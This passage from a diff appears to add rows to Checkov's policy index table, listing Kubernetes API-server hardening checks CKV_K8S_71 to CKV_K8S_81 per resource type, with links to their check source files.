+| 3176 | CKV_K8S_71               | resource                         | DeploymentConfig                                                                                 | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
+| 3177 | CKV_K8S_71               | resource                         | Job                                                                                              | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
+| 3178 | CKV_K8S_71               | resource                         | Pod                                                                                              | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
+| 3179 | CKV_K8S_71               | resource                         | PodTemplate                                                                                      | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
+| 3180 | CKV_K8S_71               | resource                         | ReplicaSet                                                                                       | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
+| 3181 | CKV_K8S_71               | resource                         | ReplicationController                                                                            | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
+| 3182 | CKV_K8S_71               | resource                         | StatefulSet                                                                                      | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                                    |
+| 3183 | CKV_K8S_72               | resource                         | CronJob                                                                                          | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3184 | CKV_K8S_72               | resource                         | DaemonSet                                                                                        | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3185 | CKV_K8S_72               | resource                         | Deployment                                                                                       | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3186 | CKV_K8S_72               | resource                         | DeploymentConfig                                                                                 | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3187 | CKV_K8S_72               | resource                         | Job                                                                                              | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3188 | CKV_K8S_72               | resource                         | Pod                                                                                              | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3189 | CKV_K8S_72               | resource                         | PodTemplate                                                                                      | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3190 | CKV_K8S_72               | resource                         | ReplicaSet                                                                                       | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3191 | CKV_K8S_72               | resource                         | ReplicationController                                                                            | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3192 | CKV_K8S_72               | resource                         | StatefulSet                                                                                      | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                              |
+| 3193 | CKV_K8S_73               | resource                         | CronJob                                                                                          | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3194 | CKV_K8S_73               | resource                         | DaemonSet                                                                                        | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3195 | CKV_K8S_73               | resource                         | Deployment                                                                                       | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3196 | CKV_K8S_73               | resource                         | DeploymentConfig                                                                                 | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3197 | CKV_K8S_73               | resource                         | Job                                                                                              | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3198 | CKV_K8S_73               | resource                         | Pod                                                                                              | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3199 | CKV_K8S_73               | resource                         | PodTemplate                                                                                      | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3200 | CKV_K8S_73               | resource                         | ReplicaSet                                                                                       | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3201 | CKV_K8S_73               | resource                         | ReplicationController                                                                            | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3202 | CKV_K8S_73               | resource                         | StatefulSet                                                                                      | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                                      |
+| 3203 | CKV_K8S_74               | resource                         | CronJob                                                                                          | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3204 | CKV_K8S_74               | resource                         | DaemonSet                                                                                        | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3205 | CKV_K8S_74               | resource                         | Deployment                                                                                       | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3206 | CKV_K8S_74               | resource                         | DeploymentConfig                                                                                 | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3207 | CKV_K8S_74               | resource                         | Job                                                                                              | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3208 | CKV_K8S_74               | resource                         | Pod                                                                                              | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3209 | CKV_K8S_74               | resource                         | PodTemplate                                                                                      | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3210 | CKV_K8S_74               | resource                         | ReplicaSet                                                                                       | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3211 | CKV_K8S_74               | resource                         | ReplicationController                                                                            | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3212 | CKV_K8S_74               | resource                         | StatefulSet                                                                                      | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                              |
+| 3213 | CKV_K8S_75               | resource                         | CronJob                                                                                          | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3214 | CKV_K8S_75               | resource                         | DaemonSet                                                                                        | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3215 | CKV_K8S_75               | resource                         | Deployment                                                                                       | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3216 | CKV_K8S_75               | resource                         | DeploymentConfig                                                                                 | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3217 | CKV_K8S_75               | resource                         | Job                                                                                              | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3218 | CKV_K8S_75               | resource                         | Pod                                                                                              | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3219 | CKV_K8S_75               | resource                         | PodTemplate                                                                                      | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3220 | CKV_K8S_75               | resource                         | ReplicaSet                                                                                       | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3221 | CKV_K8S_75               | resource                         | ReplicationController                                                                            | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3222 | CKV_K8S_75               | resource                         | StatefulSet                                                                                      | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                                  |
+| 3223 | CKV_K8S_77               | resource                         | CronJob                                                                                          | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3224 | CKV_K8S_77               | resource                         | DaemonSet                                                                                        | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3225 | CKV_K8S_77               | resource                         | Deployment                                                                                       | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3226 | CKV_K8S_77               | resource                         | DeploymentConfig                                                                                 | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3227 | CKV_K8S_77               | resource                         | Job                                                                                              | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3228 | CKV_K8S_77               | resource                         | Pod                                                                                              | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3229 | CKV_K8S_77               | resource                         | PodTemplate                                                                                      | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3230 | CKV_K8S_77               | resource                         | ReplicaSet                                                                                       | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3231 | CKV_K8S_77               | resource                         | ReplicationController                                                                            | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3232 | CKV_K8S_77               | resource                         | StatefulSet                                                                                      | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                                  |
+| 3233 | CKV_K8S_78               | resource                         | AdmissionConfiguration                                                                           | Ensure that the admission control plugin EventRateLimit is set                                                                                                                                           | Kubernetes              | [ApiServerAdmissionControlEventRateLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py)                                                |
+| 3234 | CKV_K8S_79               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3235 | CKV_K8S_79               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3236 | CKV_K8S_79               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3237 | CKV_K8S_79               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3238 | CKV_K8S_79               | resource                         | Job                                                                                              | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3239 | CKV_K8S_79               | resource                         | Pod                                                                                              | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3240 | CKV_K8S_79               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3241 | CKV_K8S_79               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3242 | CKV_K8S_79               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3243 | CKV_K8S_79               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                                      |
+| 3244 | CKV_K8S_80               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3245 | CKV_K8S_80               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3246 | CKV_K8S_80               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3247 | CKV_K8S_80               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3248 | CKV_K8S_80               | resource                         | Job                                                                                              | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3249 | CKV_K8S_80               | resource                         | Pod                                                                                              | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3250 | CKV_K8S_80               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3251 | CKV_K8S_80               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3252 | CKV_K8S_80               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3253 | CKV_K8S_80               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                                |
+| 3254 | CKV_K8S_81               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
+| 3255 | CKV_K8S_81               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
+| 3256 | CKV_K8S_81               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
+| 3257 | CKV_K8S_81               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
+| 3258 | CKV_K8S_81               | resource                         | Job                                                                                              | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
+| 3259 | CKV_K8S_81               | resource                         | Pod                                                                                              | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
+| 3260 | CKV_K8S_81               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
+| 3261 | CKV_K8S_81               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
+| 3262 | CKV_K8S_81               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                          |
